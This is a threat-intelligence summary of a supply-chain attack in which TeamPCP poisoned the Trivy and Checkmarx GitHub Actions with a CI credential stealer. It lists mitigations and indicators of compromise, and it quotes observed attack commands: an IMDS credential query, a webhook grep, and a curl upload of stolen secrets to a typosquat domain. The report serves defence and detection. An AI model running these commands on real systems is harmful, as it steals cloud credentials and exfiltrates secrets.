TeamPCP compromised Aqua Security’s trivy-action and injected a credential-stealing payload that harvested CI runner memory, queried cloud instance metadata, enumerated webhook URLs, and exfiltrated encrypted secrets to typosquat domains. The identical stealer appeared days later in Checkmarx’s ast-github-action (v2.3.28), indicating stolen credentials from the Trivy compromise were used to poison additional GitHub Actions; #TeamPCP #Trivy
Keypoints
- TeamPCP force-pushed malicious commits to aquasecurity/trivy-action tags, causing compromised action code to execute in thousands of CI workflows.
- The malicious payload scraped Runner.Worker memory for secrets, queried the EC2 IMDS for IAM credentials, searched workspaces for Slack/Discord webhooks, and packaged findings into an AES-256+RSA-4096 encrypted tpcp.tar.gz for exfiltration.
- Approximately four days after the Trivy compromise, an identical stealer executed via Checkmarx/[email protected], uploading tpcp.tar.gz to a Checkmarx-typosquat domain (checkmarx[.]zone), showing credential reuse and cascading supply-chain poisoning.
- Exfiltration used vendor-specific typosquat domains (scan.aquasecurtiy[.]org and checkmarx[.]zone) and resolver IPs (45.148.10.212 and 83.142.209.11) to disguise traffic as vendor-related activity in CI logs.
- Static controls and dependency scans failed because trusted action tags were subverted by force-pushes; runtime detection (Sysdig Secure / Falco) succeeded by detecting IMDS access correlated with subsequent binary uploads from the same process lineage.
- Mitigations include rotating all exposed secrets, auditing CI logs for tpcp.tar.gz and typosquat domains, pinning actions to commit SHAs, restricting IMDS access or enforcing IMDSv2, and enabling runtime monitoring of CI runners.
MITRE Techniques
- [T1552.005 ] Unsecured Credentials: Cloud Instance Metadata API – The stealer queried the IMDS to retrieve temporary IAM credentials, enabling cloud access from the runner (‘curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/’).
- [T1102 ] Web Service – The actor enumerated webhook URLs in the workspace for collection and potential secondary exfiltration (‘grep -r “hooks.slack.com|discord.com/api/webhooks” . 2>/dev/null | head -20’).
Indicators of Compromise
- [Domain ] Exfiltration typosquat domains – scan.aquasecurtiy[.]org, checkmarx[.]zone
- [IP Address ] Resolved exfiltration destinations – 45.148.10.212 (scan.aquasecurtiy[.]org), 83.142.209.11 (checkmarx[.]zone)
- [Filename ] Payload filename used for exfiltration – tpcp.tar.gz
- [GitHub Action ] Compromised actions and versions – aquasecurity/trivy-action (75 of 76 tags force-pushed), Checkmarx/[email protected]
- [Repository name ] Fallback exfiltration indicator – tpcp-docs (creation in victim GitHub accounts signals successful fallback exfiltration)
- [Command/URL pattern ] Exfiltration and IMDS access commands observed – ‘curl -s -o /dev/null -w %{http_code} -X POST https://checkmarx[.]zone … –data-binary @/tmp/…/tpcp.tar.gz’, ‘http://169.254.169.254/latest/meta-data/iam/security-credentials/’